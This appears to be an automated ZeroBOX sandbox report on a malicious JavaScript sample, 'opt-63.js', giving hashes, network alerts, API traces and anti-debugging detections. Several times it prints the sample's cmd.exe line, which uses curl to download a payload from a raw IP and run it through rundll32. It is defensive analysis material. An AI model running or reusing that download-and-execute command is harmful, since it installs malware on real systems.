popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

opt-63.js

AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 17, 2023, 10:35 a.m. Oct. 17, 2023, 10:38 a.m.
Size 412.9KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 27677b638817a290b98a867a960e28a1
SHA256 6fe4215a7d9dfb0827a2a3983243b740b281284747a373a9916d07817a5de88e
CRC32 82621068
ssdeep 6144:9j38P9IwPaHP79bvi5u9r9pMrSuyL3z8OF9Xk48iS+dxEDDstMpe:JBLzdk+dxE8tM0
Yara None matched

Name Response Post-Analysis Lookup
www.ssl.com
A 54.236.82.84
A 54.174.96.153
54.174.96.153
IP Address Status Action
164.124.101.2 Active Moloch
54.236.82.84 Active Moloch
89.147.111.46 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49167 -> 89.147.111.46:80 2013028 ET POLICY curl User-Agent Outbound Attempted Information Leak
TCP 192.168.56.103:49167 -> 89.147.111.46:80 2034567 ET HUNTING curl User-Agent to Dotted Quad Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: 'A3ch' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: A3ch
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Ping request could not find host A3ch. Please check the name and try again.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Ping request could not find host A3ch. Please check the name and try again.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8
GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a
DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c
SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c
SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18
MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f
New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x744b77b7
MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15
MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57
rundll32+0x393f @ 0xce393f
rundll32+0x247a @ 0xce247a
rundll32+0x1baf @ 0xce1baf
rundll32+0x12e8 @ 0xce12e8
rundll32+0x1901 @ 0xce1901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x74313f46
registers.esp: 2158108
registers.edi: 0
registers.eax: 1949384518
registers.ebp: 2158148
registers.edx: 0
registers.ebx: 0
registers.esi: 1949384518
registers.ecx: 8326504
1 0 0

__exception__

 stacktrace: 
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8
GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a
DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c
SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c
SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18
MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f
New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x744b77b7
MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15
MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57
rundll32+0x393f @ 0xce393f
rundll32+0x247a @ 0xce247a
rundll32+0x1baf @ 0xce1baf
rundll32+0x12e8 @ 0xce12e8
rundll32+0x1901 @ 0xce1901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x74313f46
registers.esp: 2158108
registers.edi: 0
registers.eax: 1949384518
registers.ebp: 2158148
registers.edx: 0
registers.ebx: 0
registers.esi: 1949384518
registers.ecx: 8326504
1 0 0

__exception__

 stacktrace: 
CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25
rundll32+0x135c @ 0xce135c
rundll32+0x1901 @ 0xce1901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x750d3ef4
registers.esp: 2160752
registers.edi: 0
registers.eax: 12198240
registers.ebp: 2160780
registers.edx: 1
registers.ebx: 0
registers.esi: 5979480
registers.ecx: 1949250940
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://89.147.111.46/gWUA/hyper
request GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt
request GET http://89.147.111.46/gWUA/hyper
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742a1000
process_handle: 0xffffffff
1 0 0
cmdline cmd.exe /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy
cmdline "C:\Windows\System32\cmd.exe" /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline ping -n 3 A3ch
cmdline cmd.exe /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy
cmdline ping A3ch
cmdline "C:\Windows\System32\cmd.exe" /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy
host 89.147.111.46
Time & API Arguments Status Return Repeated

WSASend

 buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com
socket: 964
0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

WSASend

 buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com
socket: 964
0 0
parent_process wscript.exe martian_process cmd.exe /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c A3ch || ecHo A3ch & ping A3ch || CuRl http://89.147.111.46/gWUA/hyper -o %tmp%\A3ch.log & ping -n 3 A3ch || rUndLl32 %TMP%\A3ch.log scab /k haval462 & eXIT YInQbeICo=xQgfy
Process injection Process 1932 resumed a thread in remote process 2144
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000004f8
suspend_count: 1
process_identifier: 2144
1 0 0
file C:\Windows\System32\cmd.exe